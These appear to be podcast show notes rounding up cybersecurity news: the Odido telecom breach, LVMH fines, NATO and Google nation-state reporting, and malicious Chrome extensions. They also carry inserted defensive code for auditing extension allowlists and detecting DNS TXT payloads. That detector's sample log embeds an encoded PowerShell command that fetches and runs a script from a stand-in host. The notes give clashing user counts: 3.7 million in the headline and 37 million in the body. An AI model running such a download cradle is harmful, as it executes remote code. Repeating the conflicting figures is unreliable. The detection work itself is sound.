CISO Talk by James Azar
CyberHub Podcast
300+ Chrome Extensions Steal Data from 3.7M Users, LVMH Brands Fined $25M, 6M Dutch Records Stolen

Dutch Telecom Breach Exposes 6 Million, NATO and US Signal Cyber Consequences for Russia and China, Google Maps Active Nation-State Campaigns, and Checkpoint Acquires Three Companies

Good Morning Security Gang

I hope everyone survived Valentine’s Day, overpaid for flowers, waited in line at packed restaurants, and still called it romance. That’s commitment.

We’ve got a packed show today: 6 million telecom customers exposed in the Netherlands, LVMH luxury brands fined $25 million, NATO finally talking about real cyber consequences for Russia and China, Google tying multiple nation-state actors to active campaigns, 300 malicious Chrome extensions leaking data from 37 million users, and a whole lot more.

Double espresso in hand, coffee cup cheers — let’s get into it.

6 Million Dutch Telecom Customers Exposed

Dutch telecom provider Odido disclosed a breach impacting approximately 6.2 million customers, making it effectively a national-scale cyber incident. Attackers gained unauthorized access to internal systems and exfiltrated customer data including names, contact details, and subscriber-related identifying information. There is no confirmation of financial data exposure at this time, but telecom data carries high downstream value for SIM swapping, account takeover, and targeted social engineering.

Initial indications point toward compromised credentials or insufficiently secured internal access controls rather than a novel zero-day exploit. This underscores a recurring theme: identity misuse is outpacing sophisticated exploit chains. The risk here isn’t immediate chaos — it’s persistent identity-based fraud campaigns that will unfold over months.

Mitigation at scale requires strict privileged access management, session monitoring on administrative consoles, and hardened validation procedures for customer account changes. Telecom providers sit at the heart of identity ecosystems — and attackers know it.

Louis Vuitton, Dior, and Tiffany Fined $25 Million

Luxury brands Louis Vuitton, Dior, and Tiffany, part of the LVMH portfolio, were fined a combined $25 million in South Korea following data breaches attributed to insufficient security controls and weak governance practices. Regulators determined that customer information stored in retail and CRM systems was exposed due to poor data protection measures and compliance failures.

This was not merely a technical shortcoming — it was a governance breakdown. Regulatory fines are increasingly rivaling or exceeding breach response costs, particularly in jurisdictions with strict privacy enforcement.

Multinational enterprises must localize data controls where required and minimize retention strictly to business necessity. A single centralized system serving multiple regulatory environments without segmentation is a liability. When compliance fails, the financial penalty becomes the secondary problem — brand damage is the primary one.

NATO Signals Consequences for Russia and China

At the Munich Security Conference, NATO’s Deputy Secretary General publicly stated the alliance must begin imposing tangible costs on Russia and China for sustained cyber and hybrid operations. The tone has shifted from deterrence language to consequence language.

This follows years of Russian attacks on European infrastructure and Chinese espionage targeting industrial and government sectors. The strategic shift suggests sanctions, trade pressure, and diplomatic retaliation could increasingly be tied directly to cyber campaigns.

"Hello, NATO. Good morning. My name is James Azar. I've been doing this show for (this is episode 1,061) about seven and a half, eight years. Welcome to the party. We've been knocking. You just haven't been answering. Welcome." James Azar

The risk here is escalation — but the alternative has been persistent exploitation without consequence. For multinational organizations, this means preparing for supply chain disruptions, retaliatory cyber activity, and sanction-driven operational impacts. Boards need to be briefed. Geopolitical cyber risk is no longer abstract.

Google Links China, Iran, Russia, and North Korea to Active Campaigns

Google released new research tying actors from China, Iran, Russia, and North Korea to ongoing campaigns targeting defense, aerospace, political entities, semiconductor firms, and critical infrastructure. The campaigns include credential phishing, Android malware deployment, backdoor implantation, and secure messaging exploitation.

Threat clusters such as Sandworm, Lazarus, APT28, APT45, and multiple UNC-designated groups remain highly active. Many operations are focused on Ukraine’s military and drone ecosystem, while others target semiconductor and aerospace supply chains globally.

Let me go through the notable threat actors participating:

Russian-Linked:

  • APT44 (Sandworm) – Attempting to exfiltrate information from Telegram and Signal in Ukraine

  • Temp Vermin (UAC-0020) – Using malware like Spectrum, targeting drone production and anti-drone systems

  • UNC-5125 – Leveraging Android malware called “Great Battle,” a bespoke version of Hydra banking trojan

  • UNC-579 – Exploiting secure messaging apps targeting Ukrainian military

  • UNC-4221 – Targeting secure messaging apps used by Ukrainian military personnel

  • UNC-5976, UNC-609 – Conducting malware delivery operations through WhatsApp

  • UNC-5114 – Suspected Russian espionage cluster

North Korean-Linked:

  • APT45 – Targeting South Korean defense, semiconductor, and automotive sectors

  • APT43 (Kimsuky) – Targeting infrastructure mimicking German and US defense-related entities, deploying backdoor called “ThinWave”

  • UNC-2970 (Lazarus Group) – Operation Dream Job Campaign targeting aerospace, defense, and energy sectors, relying on AI tools for reconnaissance

Iranian-Linked:

  • UNC-1549 (Nimbus Manticore) – Targeting aerospace, aviation, and defense industries in the Middle East with malware families Minibike, Two Stroke, Deep Root, and CrashPad

  • UNC-6446 – Using resume builder and personality test applications to distribute custom malware in aerospace and defense verticals across US and Middle East

Chinese-Linked:

  • APT5 (Keyhole Panda/Mulberry Typhoon) – Targeting current and former employees of major aerospace and defense contractors

  • UNC-3236 (Volt Typhoon) – Targeting critical infrastructure

  • UNC-6508 – Targeting US-based research institutions

"The name and shame campaign that President Obama came up with hasn't stopped anyone from doing it. It's in fact given them glory, they celebrate it on their internal chats. So how do you mitigate this thing? The playbook isn't working." James Azar

These campaigns are not historical retrospectives — they are live operations. Continuous threat hunting focused on identity anomalies and lateral movement is now table stakes. If your organization touches defense, technology, or advanced manufacturing, assume you are being scanned.

Fake Recruiters Sending Malware Through Coding Challenges

Threat actors are posing as recruiters and sending developers “coding challenges” that contain embedded malware. The trust model of professional networking platforms is being weaponized. Developers are downloading and executing malicious repositories under the guise of interview assessments.

The risk is direct compromise of engineering environments and access to proprietary source code repositories. Organizations must sandbox all external code submissions and implement isolated evaluation environments. Recruitment pipelines are now attack surfaces.

300 Malicious Chrome Extensions Impact 37 Million Users

Researchers uncovered more than 300 malicious Chrome extensions collectively impacting approximately 37 million users. The extensions abused browser permissions to exfiltrate browsing activity, session tokens, and potentially authentication data.

Browser-based session hijacking bypasses many traditional endpoint defenses. When the browser becomes the threat vector, the enterprise perimeter dissolves further.

Mitigation requires enforcing enterprise browser extension allowlists. Open installation policies are no longer viable in enterprise environments.
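To make the allowlist recommendation concrete, here is an added example (not code from the podcast or from Google) that models how Chrome's managed extension policies interact and audits an endpoint's installed extension IDs against them. The policy values and the 32-character extension IDs are constructed placeholders; the precedence rules (a force-list entry is always installed, an allow-list entry overrides the block-list, and `*` in the block-list denies everything else) follow Chrome's documented behaviour for `ExtensionInstallForcelist`, `ExtensionInstallAllowlist` and `ExtensionInstallBlocklist`.

```python
"""Audit installed Chrome extensions against a managed allowlist policy.

Added example, not from the CyberHub Podcast or from Google. It models the
precedence of Chrome's ExtensionInstallBlocklist / ExtensionInstallAllowlist /
ExtensionInstallForcelist policies so an administrator can see which extensions
an inventory would lose before the policy ships. All IDs below are constructed
placeholders, not real extensions.
"""
import re
from typing import Dict, List

# Chrome extension IDs are 32 characters drawn from the letters a-p.
EXTENSION_ID = re.compile(r"^[a-p]{32}$")

# Constructed managed policy: deny everything by default, permit one reviewed
# extension, and force-install one corporate extension from an HTTPS update URL.
POLICY: Dict[str, List[str]] = {
    "ExtensionInstallBlocklist": ["*"],
    "ExtensionInstallAllowlist": ["abcdefghijklmnopabcdefghijklmnop"],
    "ExtensionInstallForcelist": [
        "ponmlkjihgfedcbaponmlkjihgfedcba;https://updates.example.test/crx",
    ],
}


def validate_policy(policy: Dict[str, List[str]]) -> List[str]:
    """Return descriptions of malformed entries; an empty list means well formed.

    A mistyped ID in the allow-list silently fails open for the extension the
    admin meant to permit, so the policy is checked before it is deployed.
    """
    problems: List[str] = []
    for key in ("ExtensionInstallBlocklist", "ExtensionInstallAllowlist"):
        for entry in policy.get(key, []):
            if entry == "*" and key == "ExtensionInstallBlocklist":
                continue  # the wildcard is only meaningful in the block-list
            if not EXTENSION_ID.match(entry):
                problems.append(f"{key}: {entry!r} is not a valid extension ID")
    for entry in policy.get("ExtensionInstallForcelist", []):
        ext_id, sep, update_url = entry.partition(";")
        if not EXTENSION_ID.match(ext_id):
            problems.append(f"ExtensionInstallForcelist: {entry!r} has an invalid ID")
        elif sep and not update_url.startswith("https://"):
            problems.append(f"ExtensionInstallForcelist: {entry!r} update URL must be HTTPS")
    return problems


def decide(ext_id: str, policy: Dict[str, List[str]]) -> str:
    """Return 'forced', 'allowed' or 'blocked' for one extension ID.

    Precedence modelled here: force-list wins, then the allow-list overrides the
    block-list, then a literal '*' (or an explicit ID) in the block-list denies.
    With no policy at all the install is open, the state the text calls no
    longer viable for enterprises.
    """
    forced = {entry.partition(";")[0] for entry in policy.get("ExtensionInstallForcelist", [])}
    if ext_id in forced:
        return "forced"
    if ext_id in set(policy.get("ExtensionInstallAllowlist", [])):
        return "allowed"
    blocklist = set(policy.get("ExtensionInstallBlocklist", []))
    if "*" in blocklist or ext_id in blocklist:
        return "blocked"
    return "allowed"


def audit(installed: List[str], policy: Dict[str, List[str]]) -> Dict[str, str]:
    """Map each installed extension ID to the decision the policy would reach."""
    return {ext_id: decide(ext_id, policy) for ext_id in installed}


if __name__ == "__main__":
    inventory = ["abcdefghijklmnopabcdefghijklmnop", "p" * 32]  # constructed inventory
    print("policy problems:", validate_policy(POLICY) or "none")
    for ext_id, verdict in audit(inventory, POLICY).items():
        print(f"{ext_id}  {verdict}")
```

On Linux the resulting dictionary, dumped as JSON, is what goes into a file under /etc/opt/chrome/policies/managed/; on Windows and macOS the same policy names are set through the registry or a configuration profile. Run `validate_policy` in CI before deploying so a bad ID never widens the policy unnoticed.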

ClickFix Campaign Uses DNS for Payload Retrieval

The ClickFix malware campaign has evolved to retrieve PowerShell payloads using nslookup and DNS TXT record lookups, blending command-and-control traffic with legitimate DNS queries.

Because DNS traffic is often trusted and under-monitored, attackers can evade traditional detection models. Enabling DNS query logging with anomaly detection for encoded or unusual TXT record patterns is essential.
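The detection logic the paragraph calls for, as an added example (not code from the podcast or from any vendor product): it reads resolver log lines exported as JSON (a constructed format with the fields `ts`, `src`, `qname`, `qtype`, `answers`), ignores TXT records with well-known benign prefixes such as SPF, DKIM and DMARC, and flags answers that look like an encoded payload: long base64-like strings, high entropy, or text that decodes to PowerShell markers. The sample log lines and the `.test` domains are constructed.

```python
"""Flag DNS TXT answers that look like encoded payload retrieval.

Added example, not from the podcast or any vendor tool. Assumes resolver logs
exported as JSON lines with ts, src, qname, qtype and answers (a constructed
format). The sample lines are constructed, not captured traffic.
"""
import base64
import binascii
import json
import math
import re
from typing import Dict, List

# Constructed sample log: an SPF record, a site-verification record (both
# benign), a TXT answer carrying a base64-encoded PowerShell download cradle,
# and an unrelated A lookup.
SAMPLE_LOG = "\n".join([
    json.dumps({"ts": "2026-02-16T09:00:01Z", "src": "10.20.30.40", "qname": "example.test",
                "qtype": "TXT", "answers": ["v=spf1 include:_spf.example.test ~all"]}),
    json.dumps({"ts": "2026-02-16T09:00:02Z", "src": "10.20.30.40", "qname": "example.test",
                "qtype": "TXT", "answers": ["google-site-verification=abcdefghijklmnopqrstuvwxyz0123456789abc"]}),
    json.dumps({"ts": "2026-02-16T09:00:03Z", "src": "10.20.30.41", "qname": "a1b2.cdn-updates.test",
                "qtype": "TXT", "answers": [base64.b64encode(
                    b"IEX (New-Object Net.WebClient).DownloadString('http://cdn-updates.test/p.ps1')").decode()]}),
    json.dumps({"ts": "2026-02-16T09:00:04Z", "src": "10.20.30.41", "qname": "example.test",
                "qtype": "A", "answers": ["192.0.2.10"]}),
])

BENIGN_PREFIXES = ("v=spf1", "v=dkim1", "v=dmarc1", "google-site-verification=")
BASE64_LIKE = re.compile(r"^[A-Za-z0-9+/=_-]+$")
PS_MARKERS = ("powershell", "invoke-expression", "iex", "downloadstring",
              "invoke-webrequest", "frombase64string", "-enc")


def shannon_entropy(s: str) -> float:
    """Bits per character; random base64 sits well above ordinary English text."""
    if not s:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def try_decode(s: str) -> str:
    """Best-effort base64 decode (standard, then URL-safe alphabet), tolerating
    missing padding. UTF-8 is tried first; UTF-16LE second, because that is the
    encoding PowerShell's -EncodedCommand expects."""
    padded = s + "=" * (-len(s) % 4)
    for altchars in (None, b"-_"):
        try:
            raw = base64.b64decode(padded, altchars=altchars)
        except (binascii.Error, ValueError):
            continue
        for enc in ("utf-8", "utf-16-le"):
            try:
                text = raw.decode(enc)
            except UnicodeDecodeError:
                continue
            if text.isprintable():
                return text
    return ""


def score_txt_answer(answer: str) -> List[str]:
    """Return the reasons an answer looks like a payload carrier (empty if benign)."""
    reasons: List[str] = []
    if answer.lower().startswith(BENIGN_PREFIXES):
        return reasons
    compact = answer.replace(" ", "")
    looks_encoded = bool(BASE64_LIKE.match(compact))
    if looks_encoded and len(compact) >= 40:
        reasons.append(f"base64-like payload of {len(compact)} chars")
    entropy = shannon_entropy(answer)
    if entropy > 4.5:
        reasons.append(f"high entropy {entropy:.2f}")
    decoded = try_decode(compact).lower() if looks_encoded else ""
    hits = [m for m in PS_MARKERS if m in decoded]
    if hits:
        reasons.append("decoded text contains PowerShell markers: " + ", ".join(hits))
    return reasons


def analyze(log_text: str) -> List[Dict[str, object]]:
    """Return one alert per suspicious TXT answer with source, name and reasons."""
    alerts: List[Dict[str, object]] = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = json.loads(line)
        if rec.get("qtype") != "TXT":
            continue
        for ans in rec.get("answers", []):
            reasons = score_txt_answer(ans)
            if reasons:
                alerts.append({"ts": rec["ts"], "src": rec["src"],
                               "qname": rec["qname"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    for alert in analyze(SAMPLE_LOG):
        print(alert)
```

The benign-prefix list is where false positives are tuned: add the TXT record types your own domains legitimately serve before alerting on the rest. Pair the per-record score with a rate view (many TXT queries from one host to a newly seen name in a short window) to catch payloads that are chunked across several records.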

OpenSea Zero-Day Exploit Chain Identified

Researchers identified an active exploit chain affecting OpenSea infrastructure that could allow unauthorized account access and potential NFT asset theft. In crypto ecosystems, compromise equals irreversible loss.

Mitigation is clear: enforce hardware-based multi-factor authentication for high-value digital asset accounts and minimize hot wallet exposure.

Russian Actor Tied to “CanFailOne” Campaign

Google attributed another active campaign, dubbed “CanFailOne,” to a suspected Russian actor targeting Ukrainian organizations through phishing and malware delivery. Ukraine remains the proving ground for Russia’s cyber operations.

Every technique refined there will migrate elsewhere. Observing Ukraine’s digital battlefield provides insight into what comes next globally.

Check Point Announces Strategic Acquisitions

Check Point announced three acquisitions — Sciata, Cyclops, and Rotate — continuing its expansion into AI-driven threat intelligence and cloud security. Under new CEO Nadav Zafrir, the company has accelerated growth and strategic consolidation, reporting $2.7 billion in revenue, up 6% year-over-year.

Cybersecurity consolidation is intensifying as vendors race to integrate AI, automation, and platform-level intelligence capabilities.

Action List

  • Enforce strict privileged access management for telecom and identity systems

  • Localize data retention and comply with jurisdictional privacy requirements

  • Brief boards on geopolitical cyber escalation risk

  • Deploy continuous identity-based threat hunting

  • Sandbox all external developer code submissions

  • Implement enterprise browser extension allowlists

  • Enable DNS anomaly detection for TXT record abuse

  • Require hardware MFA for crypto and digital asset accounts

  • Assess geopolitical exposure across global supply chains

James Azar’s CISO’s Take

Today’s show reinforces a fundamental shift: cyber operations are no longer isolated technical events — they are economic and geopolitical levers. From telecom breaches in the Netherlands to NATO’s evolving stance, the line between cybercrime and statecraft continues to blur.

The second takeaway is trust erosion. Whether it’s browser extensions, recruiter outreach, DNS traffic, or privileged telecom access, attackers are exploiting assumed trust boundaries. In 2026, the perimeter isn’t your firewall — it’s your identity layer and your governance discipline. Organizations that shorten trust windows and increase verification depth will survive this era.

We’ll be back tomorrow at 9 AM Eastern with more. Until then — stay sharp, stay informed, and most importantly, stay cyber safe.
